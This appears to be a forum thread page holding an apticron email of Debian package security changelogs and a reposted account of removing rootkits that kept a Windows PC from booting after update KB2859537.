fix: memoryleak in function declaration (Closes: #726033) * upstream fix: munmap() is called with the incorrect length (Closes: #726037) * upstream fix: segfault on zend_deactivate (Closes: #726295) * upstream fix: Possible null dereference (Closes: #726320) * upstream fix: Phar::buildFromDirectory creates corrupt archives (Closes: #726379) * upstream fix: segfault while loading extensions (Closes: #726627) * upstream fix: (un)serialize() leaves dangling pointers, causes crashes (Closes: #726633) -- Ond?ej Surý <ondrej@debian.org> Tue, 22 Oct 2013 08:33:07 +0200 --- Changes for python2.7 (libpython2.7 python2.7 python2.7-minimal) --- python2.7 (2.7.3-6+deb7u2) stable-security; urgency=low * Fix installation of modules in python2.7-minimal, thanks to Jakub Wilk for the analysis -- Moritz Mühlenhoff <jmm@debian.org> Wed, 12 Mar 2014 23:45:44 +0100 python2.7 (2.7.3-6+deb7u1) stable-security; urgency=low * CVE-2014-1912, CVE-2013-4238 -- Moritz Mühlenhoff <jmm@debian.org> Wed, 05 Mar 2014 00:18:28 +0100 --- Changes for tzdata --- tzdata (2013i-0wheezy1) stable; urgency=low * New upstream version. * Remove solar87, solar88 and solar89 from the list of timezones, as they have been removed upstream. -- Aurelien Jarno <aurel32@debian.org> Sun, 26 Jan 2014 19:33:55 +0000 tzdata (2013h-0wheezy1) stable; urgency=low * New upstream version. -- Aurelien Jarno <aurel32@debian.org> Sat, 07 Dec 2013 15:06:58 +0100 --- Changes for wget --- wget (1.13.4-3+deb7u1) stable-proposed-updates; urgency=low * backported TLS Server Name Indication (SNI) to stable (patches/wget-tls-sni) from wget 1.14 http://git.savannah.gnu.org/cgit/wget.git/commit/?id=fd582e454378db9a1e218acf79f24fbe042bed98 closes: #653267 -- Noël Köthe <noel@debian.org> Sat, 1 Feb 2014 20:29:14 +0100 ======================================================================== You can perform the upgrade by issuing the command: apt-get dist-upgrade as root on pluto.myfuckingdomain.org -- apticron
  15. I spent my Saturday evening working on probably the most convoluted computer problem I’ve ever seen. This computer was infected with a rootkit virus that went undetected for who knows how long, no thanks to Symantec Endpoint Protection. I didn’t realize that at first though because there wasn’t any obvious signs of infection, and like I just mentioned, Symantec wasn’t throwing any alerts. Microsoft released a security update on Tuesday, KB2859537, that prevents a rogue application from hijacking the kernel via a particular exploit. Automatic updates installed it among 11 other updates Wednesday night. When staff came in Thursday, the computer was stuck at the “Starting Windows” screen. I started by attempting to fix the issue as if it was a problem with Microsoft Windows Update. I used every utility imaginable to clear/reset/fix Windows Update. I also reset the BIOS, screwed with the IRQs, sat through a system file check and hard drive check (which takes over an hour.) I even did a full hardware diagnostic to make sure the memory, CPU, etc wasn’t failing. Also removed unnecessary applications as well as Symantec to make sure nothing was interfering. I eventually narrowed the problem to a specific update by installing 1 update at a time, rebooting, next update, repeat. After identifying which update caused the computer to not load, I searched the web to see if others had the same problem. That’s when it happened: there was a dialog popping up in the bottom left of IE to install the latest Media Player. I had seen this dialog once before when I was on a Microsoft site today, and it looked official, so I didn’t think much of it. But now it was popping up on a non-Microsoft forum. I immediately downloaded TDSSKiller and removed two rootkits that it found (Rootkit.Win32.BackBoot.gen and Rootkit.Boot.Cidox.b.) Rebooted, installed and updated mbam. Rebooted into safe mode, ran mbamfull scan. It found 2 results (both Tojan.Vundo variants.) Rebooted and the IE popup was gone, but I ran ComboFix just to be safe. It found a few malicious files and folders (FunWebProducts, DownloadHelper to name a couple.) Then, I reset IE to make sure there wasn’t any lingering Add-ons. Next, I installed the August malicious software removal tool. After a reboot, I re-attempted to install security update KB2859537. This time, instead of locking up, the computer booted normally. Yay! Praise be to the computer gods. What was happening: KB2859537 corrected an exploit that a rootkit virus was using to hijack the computer. Because the exploit was fixed after installing the update, upon the next reboot, the rootkit is now blocked from functioning. This causes the entire computer to lock up and even BSOD in some cases. By removing the rootkit virus, I was able to install the security update without the computer locking up. I wish I could say that was fun. Hope this saves someone else some time. Update: If your computer is already locked up from the update, use your Windows disc to launch Startup Repair. During the repair, it will ask if it can use System Restore. Proceed through the menus and it will restore the computer to before the update was installed. I had a better success rate of doing this with the Windows disc than with F8 as the Rootkit corrupted the system restore utility. Source/proof: By request, I’ve gathered all of the logs from the computer and made them available to the public here. Via: Microsoft Update KB2859537 prevents PC from booting if Rootkit is present – James Watt
×
×
  • Create New...